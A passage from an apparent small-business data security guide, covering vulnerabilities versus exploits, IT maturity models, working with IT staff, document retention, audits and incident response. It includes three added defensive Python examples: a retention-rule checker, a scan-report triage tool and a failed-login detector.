but in the end, they still have to exert a minimum amount of force or effort to overcome the lock.

When writing a letter, the writer can read the same sentence many times without realizing it is wrong;
they already know how they intend it to read. Someone else reading the letter will notice the mistake right
away. Similarly, security planners will routinely overlook critical details which are obvious to someone
else. Good security is built on simple, standard, well tested components that many eyes have looked at and
many people, designers, security experts, and thieves, have tried to break.

Security by obscurity is a defense that depends on an attacker not knowing how it works to be effective.
A one-time battle plan dependent on surprise may fool the enemy, but a security plan must fool the enemy
every day, time and time again. Any flaw, no matter how small, no matter how secret, will be discovered.

Tip
In general, more eyes means tighter security.

A manufacturer claimed that their fingerprint scanning door lock based on "proprietary technology"
had not been broken in months of testing. A team from the TV show MythBusters found three ways
to bypass the lock in just a couple of days. Perhaps the Death Star could have been saved by better
operational security, or maybe they should have let the MythBusters folks review the blueprints before
building [MythBusters-2006].

Exploits and Vulnerabilities

Knowing the difference between exploits and vulnerabilities is important in assessing security and the
level of risk. A vulnerability is a potential hole in your security, such as a second-floor window which
swings outward. An exploit of that vulnerability might involve a ladder and a prybar.

It may be that there are multiple ways to exploit a particular vulnerability or that it is only a potential
problem with no known exploit. Often, detecting a vulnerability gives you time to fix it before an attacker
becomes aware of it and figures out how to use it to their advantage. A zero-day exploit is one where a
vulnerability and a publicly known exploit are discovered at the same time, usually because the bad guys
were the first to find it. The hole in the fence at Los Alamos is a good example of a zero-day exploit— the
hole was in common use before it was discovered by security and fixed.

A defense-in-depth can sometimes prevent certain exploits and lessen the risk of a vulnerability. With our
second-floor window example, controlled access to the property with a fence and a guard shack might
make it rather difficult to sneak in with a ladder or a prybar.


Keep Your Eyes Open

In security, paranoia is an asset. Noticing suspicious patterns and odd details is important to protecting
your business. You would probably be suspicious if someone you did not recognize was leafing through
files in your office or called you and asked for your credit card number. Maybe you would find it odd if an
employee you were paying minimum wage suddenly had a $500 watch or you ran into a client when one
of your salespeople was supposed to be meeting them for lunch. If you are prudent, you probably go over
accounts or budgets and expenses on a regular basis. Noticing odd behavior is not a basis for flying off
the handle— unusual things happen; certainly, however, questions might be asked. Once you are familiar
with data security, you will also be able to notice when things are out of place in the electronic world.

Tip
Careful records are critical to establishing patterns and reconstructing events when a problem is
discovered. Having safe copies of records prevents tampering and fraud.

I once had an employee who had repeatedly violated company policy. Notes of this and a disciplinary
warning were placed in the employee record. The employee, who was responsible for filing, quietly
removed the notes. They were not aware that management routinely copied employee records and stored
them in a safe.

Tip
Be assertive and ask questions.

When I worked at the Pentagon, we were trained to avoid a common attack. Most secure facilities have a
phone on the outside so a visitor can call to have an authorized person let them in. One technique is for an
intruder to walk up and pretend to be talking to someone inside the facility. When an authorized person
arrives, they say, "Oh, hang on, someone else just showed up." and follow the new arrival in. Authorized
personnel are uncomfortable about challenging the intruder.

Management and personnel need to be trained to be assertive and ask questions in all security situations
and any time something smells fishy. Often, a manager who has their credentials challenged will punish
the employee. This is counter-productive and will allow an attacker to bluster their way through defenses.
Instead, managers should expect to be challenged and discipline those who do not follow established
procedures.

Building a Data Security Strategy

In this section, we will begin to develop a top-down security strategy for your business, looking at what
needs to be protected, how to begin developing security policies, responding to incidents, and making
sound purchases. In later sections, we will explore how attackers attempt to breach your networks and
access your data, applying basic security principles to making their job harder.

First Steps
One of the first things you need to think about in the context of data security is what you want technology
to accomplish for your business. Is your website an essential part of your sales effort or are most of your
leads generated from referrals? What technology makes the biggest difference in your daily productivity?
What technologies actually detract? By asking questions like this, you start to get a basis for making risk
decisions— how far you are willing to stick your neck out to support certain IT strategies and how much
protection is worthwhile. If a piece of technology does not improve your ability to do business, why take
on expense and risk?


Another good starting point is figuring out where you are now in the security scheme of things. Doubtless
you have some interest in securing your business and are putting effort toward that end or you would not
be reading this. That immediately puts you ahead of some. The COBIT® IT management standard uses a
maturity model which generally describes where a business is on the road to IT nirvana:

COBIT® IT Maturity Model

Level 0, Non-Existent: Management processes are not applied at all.
Level 1, Initial: Processes are ad hoc and disorganized.
Level 2, Repeatable: Processes follow a regular pattern.
Level 3, Defined: Processes are documented and communicated.
Level 4, Managed: Processes are measured and monitored.
Level 5, Optimised: Good practices are followed, automated, and steadily adjusted.

[Itgi-2005 pp 18]

Notice that this is not expected to be an instantaneous transition, nor are you expected to sit down, write
hundreds of policies, and figure out how to implement them. Rather, policies and practice evolve together
in a feedback loop. As you figure out what works for your business, the best practices become policy. As
you get better at implementing, monitoring, and adjusting those policies, your IT structure will become
more mature, robust, and valuable.

A more detailed description of what the various stages mean for overall IT management is given on page
50 of the standard, but COBIT® also provides a specific scale for IT security on page 122. Since the
descriptions are long, I will only quote two levels here, the beginning and end of the process:

1 Initial/Ad Hoc
The organisation recognises the need for IT security. Awareness of the need for
security depends primarily on the individual. IT security is addressed on a reactive
basis. IT security is not measured. Detected IT security breaches invoke finger-pointing
responses, because responsibilities are unclear. Responses to IT security breaches are
unpredictable.

5 Optimised
IT security is a joint responsibility of business and IT management and is integrated
with corporate security business objectives. IT security requirements are clearly
defined, optimised and included in an approved security plan. Users and customers
are increasingly accountable for defining security requirements, and security functions
are integrated with applications at the design stage. Security incidents are promptly
addressed with formalised incident response procedures supported by automated
tools. Periodic security assessments are conducted to evaluate the effectiveness
of implementation of the security plan. Information on threats and vulnerabilities
is systematically collected and analysed. Adequate controls to mitigate risks are
promptly communicated and implemented. Security testing, root cause analysis of
security incidents and proactive identification of risk are used for continuous process
improvements. Security processes and technologies are integrated organisation wide.
KGIs and KPIs for security management are collected and communicated. Management
uses KGIs and KPIs to adjust the security plan in a continuous improvement process.


The most difficult work is in the middle. Ad hoc policies are difficult to automate and waste time discussing
small details. The overhead of a formal (but sensible) policy can be made up in automation and reduction
of friction, but a sensible policy cannot be written unless backed by experience and research. Before
reaching stage 4, you do not have enough information to really do adequate risk analysis in many cases,
but before reaching stage 3, ad hoc processes and general chaos reduce the utility of the information that is
gathered. Because of all of this, climbing the hump is hard, but it does get easier, especially when leaning
on established industry best practices and learning from the mistakes of others.

Your IT Professionals
The people that care for your computers have your business in their hands more so than any other
professional, such as an accountant or a lawyer. Their job is arcane, difficult to oversee, and requires them
to have access to disparate parts of your enterprise. Like a doctor, there is only so much you can do to
check up on them and then you just have to let them do the job. As such, perhaps the most important
quality in choosing an IT professional is trust.

As businesses are becoming overwhelmingly committed to electronic documents, essentially all of a
business' information passes through the purview of the top-level system administrator. They have direct
access to the hardware, the software, and the network. They have the skills of a hacker, or they would
not be able to secure your systems. Even if you use low-level protection like encryption and passwords
to protect documents, they have the ability to either simply override the protections or snoop on you to
discover the passwords. It might take time, but if they are determined, they can do it [4].

Happily, most professionals are more interested in doing their jobs. Information security and systems
administration is a demanding discipline that often comes with limited recognition or reward. Those that
succeed do so because of a dedication and work ethic which drives them to master the skills and keep up
with changing technology. IT professionals take personal pride in the systems they maintain.

Tip
Business people work with people every day. IT people deal with machines. This leads to half
of the communication problems.

Active participation and open communication is the best way to reduce the threat of a rogue IT professional.
By making the effort to understand and involve yourself you not only have a better chance of noticing
potential problems, but you build trust and professional respect. Because of their dedication to a hard-edged
technical discipline, many good IT professionals are somewhat antisocial and apolitical. They may also
be brutally frank. Remember that IT deals with machines which never compromise and always take things
literally. This often leads to misunderstandings with business people who work on a very different level.

IT people often present options and risks very differently than other professionals. Managers usually
present a small number of options (often three) and their business risks. They clearly identify the option
they recommend (often the last one). When several managers are in a meeting together, discussion usually
converges on two options until the person in authority decides between them.

IT people often present one solution, then present variations on that solution, sometimes getting quite
complex and quickly confusing management. They are not presenting their alternatives as realistic options
but to demonstrate why their preferred solution (the first one) is correct. When you get several IT people
together, the solutions being discussed seem to diverge rapidly instead of working toward consensus.

This is an education problem with IT professionals. This style of argument is how IT people (and other
scientists) check their arguments and get feedback. Because technology does not compromise, they need
to know (and demonstrate) that their solution is rigorously correct. They do not realize that management
does not (and should not) care as long as they have done their job. IT professionals need to change their
presentation style and adapt to your vocabulary, explaining the minimum you need to understand to make
a business decision. Unfortunately, many IT people will not change and you will need to deal with this
problem from time to time, dragging them away from theory and back to the real concern: what is the
bottom line? At the same time, even if the presentation is wrong, the presenter is identifying real risks, and
you must not tune them out until you understand what it is they are trying to say, no matter how frustrating
that might be.

[4] But see the discussion starting in the section called “Shared Folders and Files” about storing documents on untrusted computers or where the
administration is not trusted.

Tip
A good go-between, a professional in multiple fields, can translate IT-speak and present
alternatives in a digestible manner, smoothing communications.

One way to improve the situation is to find a translator: someone who understands enough of both your
field and IT to summarize the issues. These are usually IT people who have a degree in something other
than Computer Science who see technology as a tool, who have had to focus on practical application rather
than theory. As an example, I have a background in ecology and did work with simulations in college. I
wrote programs, but only as a means to an end; they were tools for answering questions. If the programs
could not be explained in non-IT terms, they were useless.

A good go-between does not have to be an expert in either field, they just have to be able to ask the
right questions and understand the answers. These are the people you want in your top-level IT positions,
trouble-shooting problem projects, and dealing with security incidents. They are hard to find, and hard to
recognize, but they do exist.

This type of professional can also be deliberately trained. When my simulation experience landed me a job
in the Pentagon working with strategic analyses, the first thing my boss did was put me on the floor with
the Air Force analysts. I was hired as a programmer, but I spent those first weeks as a user, a customer,
of the software I was eventually to maintain and redesign. I had to learn the terminology, processes, and
needs of the people I was hired to serve before I was allowed to do my job. I went from there to building
small tools, essentially templates or jigs, for very specific problems. Finally, when they felt I had learned
enough to get by I was allowed to work with the larger systems, but I still spent considerable time on the
floor with the pilots.

By taking a promising IT person and putting them in with your regular staff, making them learn your
business, you may end up with someone who can give you the feedback you need in a form you can use.
You can also go the other way, by having one of your employees work part-time as an IT liaison to bridge
the language gap and make IT solutions better targeted, easier to understand, and more practical. Choosing
someone to put into this role takes care; doing it successfully takes someone whose ego won't get in the way
of learning a new and unfamiliar field and having to build the respect of the professionals they have been
thrown in with. You also have to beware the advice of the hobby IT professional who may set up computers
or networks at home and second-guesses IT's claims of cost or risk; techniques which work for two or even
ten computers do not scale to one hundred. They may have a point, but take it with a grain of salt.

Once you have a good go-between, they need to split their time so that they can keep up to date with
both camps and remain relevant. If you do not have enough to go around, you can have one person
consult to multiple teams or departments: walk the beat, sit in on meetings, review documents, and conduct
diplomacy. I have seen this work very well; it is somewhat like the Of Counsel position in a law firm [5].

IT expertise is critical to your business, but individual IT people, whether in house or outsourced, should
not be allowed to become indispensable. Good documentation, maintenance records, and problem tracking
help someone else pick up a task when needed. Sometimes employees have the mistaken impression that
being indispensable creates job security. In reality it locks them into a job with no chance of advancement
and will eventually lead to trouble. For the employer, there is always the worry about the inevitable job
change, illness, family emergency, or other sudden crisis that can cripple an unprepared business. A vendor
which has you locked in has no reason to negotiate and little need to deliver quality service.

[5] Sometimes this can happen by itself, as someone with cross-over expertise lands naturally in the role of an unofficial diplomat. Your first step in
finding a go-between may be determining whether one is already there and how you can make better use of their skills.

Tip
Not involving yourself in IT is like not being involved in the company finances— you are inviting
someone to take advantage of you.

It may very well be that you are thinking “I don't have time to involve myself in IT.” That may well be
true, but like accounting, you just may not be able to afford not to be involved. If you are reading this
document, you already know that the world is changing. There is no way to turn back the clock and learning
to compete in the new environment means fitting IT into your overall strategy. Finding the right balance
is hard, but it must be found.

Document Retention and Protection


Document retention rules apply to more than just electronic data, but many small businesses may not have
coherent policies. Often rules for certain types of files, such as financial information, employee records, or
health information, are set by law. Other information may be controlled by contractual privacy policies or
confidentiality agreements. These rules usually specify the minimum and maximum time that documents
may be stored and who may access the documents. You may wish to implement specific policies to retain
or destroy outdated documents which fall under no particular rules in order to avoid costly document
production in response to subpoenas [SoleckiRosenberg-2004]. In all cases, you should consult books and
attorneys with coverage of the laws in your area.

We will discuss technologies for solving these problems elsewhere, but the first step is identifying what
types of documents may require special treatment. You probably already handle some paper documents
specially by locking them up, using a shredder to dispose of them, etc. Extend this to electronic documents
and think about what documents may need:

• to have restricted access,

• to be securely deleted,

• to be retained or deleted on a schedule,

• to be protected when sent over the Internet,

• to be protected from tampering or alteration,

• to have notarization or proof of service.
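As an added illustration (my own example code, not part of the original document), here is a small Python script that applies retention rules of the kind described above to a list of documents and says, for each one, whether it must still be kept, may be destroyed, has overstayed its maximum, or is frozen by a legal hold. The categories, retention periods, and document names are constructed placeholders, not figures from any statute or standard; a real schedule must come from your attorney.

```python
"""Added example: evaluating document retention rules.

The rules, categories and documents below are constructed for illustration
and are not taken from any law or standard."""
from datetime import date

# Constructed rules: category -> (minimum_days, maximum_days).
# A maximum of None means "no upper limit on storage".
RETENTION_RULES = {
    "financial": (7 * 365, None),
    "employee": (3 * 365, 5 * 365),
    "health": (6 * 365, None),
    "general": (0, 2 * 365),
}


def classify(category, created, today, legal_hold=False):
    """Return 'hold', 'retain', 'may-destroy' or 'must-destroy' for one document."""
    if category not in RETENTION_RULES:
        raise ValueError("no retention rule for category: %s" % category)
    if legal_hold:
        # A subpoena or litigation hold overrides every destruction rule.
        return "hold"
    minimum, maximum = RETENTION_RULES[category]
    age = (today - created).days
    if age < minimum:
        return "retain"
    if maximum is not None and age > maximum:
        return "must-destroy"
    return "may-destroy"


def retention_report(documents, today):
    """documents: iterable of (name, category, created_date, legal_hold)."""
    return {name: classify(category, created, today, hold)
            for name, category, created, hold in documents}


# Constructed sample: document list and the date the report is run.
SAMPLE_TODAY = date(2007, 5, 19)
SAMPLE_DOCUMENTS = [
    ("2005-ledger.xls", "financial", date(2005, 1, 10), False),
    ("old-memo.doc", "general", date(2004, 3, 1), False),
    ("old-memo-held.doc", "general", date(2004, 3, 1), True),
    ("j-smith-file.pdf", "employee", date(2003, 6, 1), False),
]


def demo_report():
    """Run the report over the constructed sample."""
    return retention_report(SAMPLE_DOCUMENTS, SAMPLE_TODAY)


if __name__ == "__main__":
    for name, status in sorted(demo_report().items()):
        print("%-20s %s" % (name, status))
```

The point of the script is the order of the checks: a hold is tested before any age arithmetic, so a document under subpoena is never reported as destroyable no matter how old it is.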

Documentation, Policies, Audits— How Much, How Often


Small Setups
The simple fact is that if your business is more than one person, and probably even if it isn't, basic
documentation on your network, computer configuration, and security is a necessity. If your setup is not
documented, you will have trouble getting help when you need it. Consultants will waste precious time
figuring out how things were supposed to work instead of fixing problems.

Tip
A doctor needs a good case history to treat a patient; a computer maintenance record fills the
same need and allows a professional to diagnose problems more effectively.

At a minimum for a small setup:

• Document the hardware, software, and versions on each system.

• Store license keys and warranty information for easy access along with dates of purchase and
installation.

• Document the changes made to a system to get it ready for use so you can follow the same steps when
repairing or setting up new systems.

• Store installation CDs, restore disks, and program disks so they may be easily located.

• Keep track of when maintenance is performed (virus scanning, updates, backups, repairs, etc.) or, if run
automatically, note when they are run and how often they are checked.

If outside consultants do these things for you, insist that they provide this documentation for your files on
every service. You never know if you will need to use a different vendor for some reason, and having your
own copy is a good precaution. For similar reasons, make sure you control the software disks, installation
keys, and warranty information. These would be good things to lock in a safe in case of fire or other
incident. You can make copies of the disks for everyday use.

For Internet-facing machines, such as a company web or mail server, document what services you run and
keep safe copies of system settings. This will help you restore them if an intruder alters them and may
provide clues as to how they got in. Administrators should keep a journal of changes and events; I typically
added a bulleted list to the end of each day's charge sheet and kept a more detailed journal online. The
journal provides an easy point for someone new to pick up. System logs need to be backed up too, and, if
possible, immediately written to a different machine to keep an intruder from altering them.

Use some form of problem tracking or trouble ticket software to monitor problems and ongoing resolution.
There are many web-based systems at all price ranges (e.g. Best Practical Solution's RT [6]). The important
thing is that you can tell quickly what problems need to be solved, how long they have been open, and make
sure recently fixed problems have been resolved satisfactorily. A printout can be gone through quickly
in a meeting. The system will also allow notes to be added to problem reports so that someone can look
back and see how a similar problem had been solved or whether a certain type of problem is occurring
frequently. You can make such a system do double duty by using it to track non-IT problems as well.

Tip
Make sure each PC, workstation, or server is easily identifiable. The easiest way to do this is
with property tags and ID numbers. Non-removable tags or engravings also make tracking stolen
equipment much easier.

Documentation is not useful if it is not checked periodically. Incorrect information is worse than none at
all. Sit down and check maintenance records to see that they have been updated and that maintenance is
actually being done on schedule. It is easy for schedules to slip while dealing with day-to-day emergencies.
Look at vendor invoices to make sure they identify the machine and report what was done and why. If you
do not understand, ask questions.

[6] http://www.bestpractical.com/rt/index.html

Tip
Gibson Research's [7] Shields Up [8] is a website which will run a quick test of a SOHO PC and
produce a security report.

There are automated tools for detecting vulnerabilities in PCs and servers. Nessus [9] is one of several such
products. Using one on a regular basis and fixing reported problems will go a long way toward making
your systems more secure. The bad guys have access to the same tools and running them will be one of
their first steps.

Larger Setups and Standards Compliance


If you have a larger setup or have to comply with external standards such as HIPAA, or the Payment
Card Industry Data Security Standard (PCI DSS) your documentation needs will be more complex. The
cost of regulatory compliance can be high, particularly where the legal landscape is changing. Recently
passed regulations have not had the time to be interpreted by the courts and some laws, such as state
consumer protection laws, may be triggered without a business' awareness, merely by serving an out-of-
state customer (e.g.: California SB 1386 [CaSenate-2003]). Small and medium-sized businesses without
a dedicated compliance department can be hard pressed to stay informed, let alone compliant.

A more proactive approach may be in order. Even where you are not specifically required to conform to
a particular high-level industry standard, using one, such as COBIT®, ISF Standard of Good Practice, or
ISO/IEC 17799:2005, as the basis for your policies can yield many advantages:

• useful guidance for policy development so you do not need to start from scratch

• milestones to measure progress and plan improvement

• a common framework and vocabulary for working with IT and security professionals, partners, and
vendors, including some “canned” policy or auditing products.

• preparation for future regulatory changes

• reducing the threat of being sideswiped by non-compliance to laws you are unaware of and allowing
you to defend policies by referring to accepted best practice

• new opportunities such as eligibility for contracts and increased customer confidence

[Harbert-2006, Itgi-2006]

Some of the most important things that are required by standards are:

• IT security is recognized at the business level and accounted for in strategic planning.

• Clearly defined responsibility for overall IT security and for each system. This can range from a single
individual responsible for all security and systems (in a very small setup) to a group responsible for
overall security and individual “ownership” of individual critical systems. Standards encourage different
security roles to be distributed among different people, so that the people validating security are not
the people providing it.

• That information and systems be graded according to their value or need for protection, that regular risk
analysis be performed, that security resources be allocated accordingly, and that emplaced security is
examined and audited regularly.

[7] http://www.grc.com/intro.htm
[8] https://www.grc.com/x/ne.dll?bh0bkyd2
[9] http://www.nessus.org/

• Controls for restricting access to systems and information to those with a need to access them, protection
of information within the business from inadvertent disclosure, and safeguards for information in transit
to and storage by third parties.

• A defined process for keeping systems up to date and for approving changes to systems, policies, and
procedures, including testing systems changes before implementation.

• That breaches of security, suspected breaches, and suspected vulnerabilities are reported.

• Staff education in security practices and requirements including clearly written and consistently
enforced policies in acceptable use of computers, networks, information, and company-owned software.

• Physical security to prevent direct access to critical systems and information.

[Isf-2005a SM1.2, Itgi-2005 pp 119-122, Dhhs-2003, PciSsc-2006]

So the bottom line, then, is that these policies need to be written in some form and some record needs to
be made whenever they are implemented. For businesses on the small end of the range, reading and trying
to implement these standards can seem daunting. A small business is unlikely to have an “IT Steering
Committee” or any kind of complex approval process for software changes, beyond, perhaps, John and
Susan sitting down over lunch. PCI DSS, HIPAA, and ISO 17799 make some allowance for small and
medium-sized businesses. Cobit®, aside from its other virtues, makes assumptions about the size and
structure of the business.

Even if a process is simple and informal, it is still worth documenting and recording the decisions made.
Like the process itself, the documentation will not be very complex. Regarding John and Susan, for
instance, the following might be sufficient:

Met with Susan today to discuss the changes to the backup system. Showed her the
research I had done on Acme Corp's product, including favorable security reviews. She
expressed reservations over committing to a single vendor, but we both agreed their
product would best fit into our current structure, particularly the accounting system.
Decided to go ahead with purchase and rollout. — John.

It documents an approval process, records that research was done (printouts of reviews can be added to the
file), and details the reasons for and against the decision. Not only is this a step toward standards compliant
procedures, but it means that a year or two down the road you can look back at the file and see why a
particular change was made. All too often, people are afraid to challenge old systems because they do not
remember why the decision was made and that those reasons may no longer be relevant (perhaps because
the old accounting system is no longer used). Lastly, the document is simple and adds little overhead.

Many other requirements can initially be filled in a similar fashion. In a small business, it is unlikely that
there will be many systems, categories of information, or classifications of employees which need to be
documented. Workflows will be short and simple. Documents and policies can grow with the business
and as problems are discovered.

One complexity which should not be ignored is the fact that Information Security records themselves
are a category of document which may need special handling! For instance, HIPAA requires that
security policies and records must be retained for six years [Dhhs-2003 §164.316b2i]. Documents that
contain sensitive security information may need to be protected, and documents such as logs which may
accidentally contain personal, confidential, or otherwise sensitive information may need to be protected,
redacted, or deleted on a schedule.

Frequency and type of audits vary widely with the needs of the organization, budget constraints, and
perceived risks, but there are some rules of thumb.

Many tools, such as virus/malware scanners, vulnerability scanners, and intrusion detection systems can
be run daily without intervention but someone must actually look at the output in order for them to be
effective. Some tools can automatically send reports to a central location, such as an administrator's email,
and this should be looked for when selecting tools. The difference between a
successful and a failed run should be immediately obvious, especially if many systems are being scanned,
otherwise problems will be lost in noise.
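The following is an added example (mine, not from the original document) of the point just made: many automated reports are reduced to an exception list so that a failed run, a machine that never reported, or a scan with findings stands out, and a fully clean night produces nothing to read. The one-line report format, host names, and sample lines are constructed for the example; real scanners each have their own output.

```python
"""Added example: reducing many scan reports to an exception list.

The report format, host names and sample lines are constructed."""
import re

# Constructed one-line-per-host report format:
#   <host> <scanner> <OK|FAILED> findings=<n>
REPORT_LINE = re.compile(
    r"^(?P<host>\S+)\s+(?P<scanner>\S+)\s+(?P<status>OK|FAILED)\s+findings=(?P<n>\d+)$")


def triage(expected_hosts, report_lines):
    """Sort every expected host into exactly one bucket.

    Buckets: 'missing' (no report arrived), 'failed' (scanner did not complete),
    'findings' (completed, found something), 'clean'. Lines that do not parse
    go into 'malformed' so a broken reporting pipeline is itself visible."""
    seen = {}
    malformed = []
    for line in report_lines:
        line = line.strip()
        if not line:
            continue
        m = REPORT_LINE.match(line)
        if not m:
            malformed.append(line)
            continue
        seen[m.group("host")] = (m.group("status"), int(m.group("n")))

    result = {"missing": [], "failed": [], "findings": [], "clean": [],
              "malformed": malformed}
    for host in sorted(expected_hosts):
        if host not in seen:
            result["missing"].append(host)
            continue
        status, n = seen[host]
        if status == "FAILED":
            result["failed"].append(host)
        elif n > 0:
            result["findings"].append((host, n))
        else:
            result["clean"].append(host)
    return result


def needs_attention(summary):
    """True when anything other than clean reports was seen."""
    return bool(summary["missing"] or summary["failed"]
                or summary["findings"] or summary["malformed"])


# Constructed sample: four reports arrived, one is garbage, one host is silent.
SAMPLE_REPORTS = """
pc-01 avscan OK findings=0
pc-02 avscan OK findings=3
pc-03 avscan FAILED findings=0
mail-01 avscan OK findings=0
garbage line here
"""
EXPECTED_HOSTS = ["pc-01", "pc-02", "pc-03", "pc-04", "mail-01"]

if __name__ == "__main__":
    summary = triage(EXPECTED_HOSTS, SAMPLE_REPORTS.splitlines())
    if needs_attention(summary):
        for bucket in ("missing", "failed", "findings", "malformed"):
            if summary[bucket]:
                print("%-9s %s" % (bucket + ":", summary[bucket]))
    else:
        print("all %d hosts reported clean" % len(summary["clean"]))
```

Note that a host which sends no report at all is treated as a problem, not as clean; silence is the failure mode most easily lost in the noise.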

Quick checks of security status can be performed at a weekly meeting. As noted above, a printout from
a problem tracking application is an effective and efficient way to view recent activity and outstanding
issues. A more thorough check of maintenance records, security reports, and other documents can happen
monthly, with a full top-down audit quarterly.

The frequency of external audits depends on many issues. First, external auditors tend to be expensive,
so there is no sense in bringing in an outside auditor without having done a full internal audit first. Why
pay someone to catch mistakes you might have fixed yourself? Instead, use the external auditor to verify
your internal procedures and find problems that would never have crossed your mind at all. How often
you do it depends on whether you have any requirements to maintain a certification; if so, you will likely
need an external audit on a regular (say yearly) schedule and may have the threat of random spot checks.
If you are not required to audit on a schedule, then you need to look at how the cost of the service affects
your budget and how quickly your procedures change. If you have relatively stable procedures and regular
internal audits, it may make more sense to spend the time and money on other security needs and bring
an outsider in less frequently. No matter what you decide, make sure an auditor you hire is aware of your
security goals, resource limitations, and the threats you are intending to address so they can concentrate
their effort where it will give you the most benefit. There is no sense in paying money to have them point
out problems you have no intention or capability of fixing.

Tip
I like to set up an internal web page with all of the security policies clearly laid out. Employees
should bookmark this page in their web browser. During an audit, if they cannot remember a
specific policy, they can quickly navigate to the required page and demonstrate that they know
how to find the needed information. This also helps with the inevitable nervousness that going
through an audit brings and makes sure the employee responds with the most current policy. The
obvious exception to this is backup and recovery procedures which must be printed and bound
so that they can be accessed when computers and networks are not functioning.

An external auditor may examine many things. They will examine your policies and a representative
sample of your records and documents. They want to know whether your policies are sound and whether
you actually follow them consistently. They will likely quiz random employees to see if they know and
understand your policies and their responsibilities. Depending on the type of audit, they may also examine
your physical layout and security (are cabinets locked, unoccupied terminals logged out, can a security
monitor be seen by someone on the other side of the desk?), or try to break into your network or computers.
Good security auditors will try “human engineering” to trick your employees into violating security. When
preparing for an audit, you must anticipate these tactics and ensure that everything is in order.

An Incident Response Plan


No matter how good your security is, you will eventually have to deal with an incident. Various regulations
require you to have a documented Incident Response Plan [Dhhs-2003 §164.308a6, PciSsc-2007 §12.9,
CaSenate-2003], but provide little guidance as to how to organize or implement such a plan. Common IT
management standards also offer little help [Isf-2005a SM5.4, Itgi-2005 DS5.6, DS8], with ISO 17799
providing the most detail [IsoIec-2005 §13]. The Computer Emergency Response Team Coordination
Center [10] (CERT/CC) provides a detailed handbook on organizing a Computer Security Incident Response
Team or CSIRT [SeiCm-2001]. The discussion here will provide an overview focusing on practical rather
than organizational matters.

[10] http://www.cert.org

A security incident may take many forms:

• A physical break-in where equipment or media is missing or may have been accessed.

• An attempted network or computer break-in.

• A successful computer or network break-in.

• A virus or malware infection.

• Missing (lost or stolen) media or hardware.

• Unauthorized access to documents or data by an employee, vendor, or third party.

• A Denial-of-Service attack.

In some cases, you may not be able to tell whether confidential data was actually accessed or copied and
may need to assume the worst, at least until the incident can be completely investigated.

Attempted accesses should be reported, even though they were not successful. Reporting attacks to
appropriate authorities, beginning with the owner of the network which originated the attack, can help
other organizations locate and close security holes and may temporarily eliminate an attacker. An attacker
who fails to gain entry repeatedly only needs to succeed once. Make sure that security rules are modified
to block or monitor repeated access attempts from the same source. If (as is likely), there are too many
attempts to report, choose the attacks which target software and services you run and therefore concern
you the most.
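As an added example (not part of the original document), this Python script finds sources that repeatedly fail to log in within a short window, which is the kind of pattern the rules above should block or monitor and the kind of attempt worth reporting to the originating network's owner. The syslog-like line format, the addresses, the threshold of five failures, and the ten-minute window are all assumptions for the example.

```python
"""Added example: detecting repeated failed access attempts from one source.

The log format, addresses, threshold and window are constructed assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed format:
#   2007-05-19 02:14:07 sshd: Failed password for root from 192.0.2.10
FAILED_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) \S+: Failed password for (\S+) from (\S+)$")


def parse_failures(lines):
    """Return [(timestamp, username, source)] for every failed attempt."""
    events = []
    for line in lines:
        m = FAILED_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3)))
    return events


def repeated_sources(events, threshold=5, window=timedelta(minutes=10)):
    """Return {source: (count, first, last, usernames)} for each source with at
    least `threshold` failures inside some sliding window of length `window`."""
    by_src = defaultdict(list)
    for ts, user, src in events:
        by_src[src].append((ts, user))

    flagged = {}
    for src, items in by_src.items():
        items.sort()
        best = None      # (count, start_index, end_index) of the densest window
        start = 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            count = end - start + 1
            if best is None or count > best[0]:
                best = (count, start, end)
        if best is not None and best[0] >= threshold:
            count, s, e = best
            users = sorted({u for _, u in items[s:e + 1]})
            flagged[src] = (count, items[s][0], items[e][0], users)
    return flagged


# Constructed sample log: one source hammers several account names in seconds,
# another is a single user mistyping a password once before logging in.
SAMPLE_LOG = """
2007-05-19 02:14:07 sshd: Failed password for root from 192.0.2.10
2007-05-19 02:14:09 sshd: Failed password for admin from 192.0.2.10
2007-05-19 02:14:12 sshd: Failed password for root from 192.0.2.10
2007-05-19 02:14:15 sshd: Failed password for test from 192.0.2.10
2007-05-19 02:14:18 sshd: Failed password for root from 192.0.2.10
2007-05-19 02:14:20 sshd: Failed password for oracle from 192.0.2.10
2007-05-19 02:30:00 sshd: Failed password for jsmith from 198.51.100.7
2007-05-19 02:31:10 sshd: Accepted password for jsmith from 198.51.100.7
2007-05-19 03:00:00 sshd: Failed password for root from 192.0.2.10
"""

if __name__ == "__main__":
    for src, (count, first, last, users) in repeated_sources(
            parse_failures(SAMPLE_LOG.splitlines())).items():
        print("%s: %d failures between %s and %s, accounts tried: %s"
              % (src, count, first.time(), last.time(), ", ".join(users)))
```

The sliding window matters: one employee who fumbles a password is never flagged, while a source cycling through many account names in a few seconds is, and the list of account names it tried is exactly the detail you would include in a report.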

When a security incident is discovered, there are three immediate goals:

Immediate Goals
Contain the Damage: Stop the spread of an infection, close the hole an intruder is using to enter,
and protect data from unauthorized access.

Restore Services: Get computers, systems, or services back into (safe) operation so that
business can continue. This may mean that services operate in a degraded
(slower or reduced functionality) mode until complete repairs can be made
and security reestablished.

Preserve Evidence: Any data which can identify the attacker, the means of entry, or the amount
of data they may have accessed should be preserved for later analysis.

Tip
Make sure that the appropriate points of contact for reporting incidents are well posted. An
internal webpage is probably a good idea and gives you a place to post advisories and reporting
guidelines. If you or your security vendor relies on computer-based reporting and tracking, make
sure there is also an alternative, since problems involving computer, network, or account failures
will need to be reported too.

Implicit in these goals is a means to actually identify and report the problem in the first place. This requires
one or more points of contact assigned to incident response and available, preferably 24/7. Problems
may also be reported by automated systems which may be set up to page or otherwise notify on-call
administrators. These personnel start an incident report and classify the problem. Next, they refer to policy
to determine what other members of IT, Security, and Management need to be involved and how quickly.
Then, if the problem is legitimate, they attempt to satisfy the three immediate goals. The group of Security,
IT, and Management who are involved in handling security breaches are the Incident Response Team,
sometimes referred to as a Computer Emergency Response Team (CERT) or Computer Security Incident
Response Team (CSIRT). We use the acronym CSIRT here.

In the early stages of dealing with a security breach, a heavy-handed approach is often safer and easier.
For instance, it may be simplest to remove a compromised machine from the network and temporarily
install a different machine for an employee. This will give your CSIRT time to examine the machine
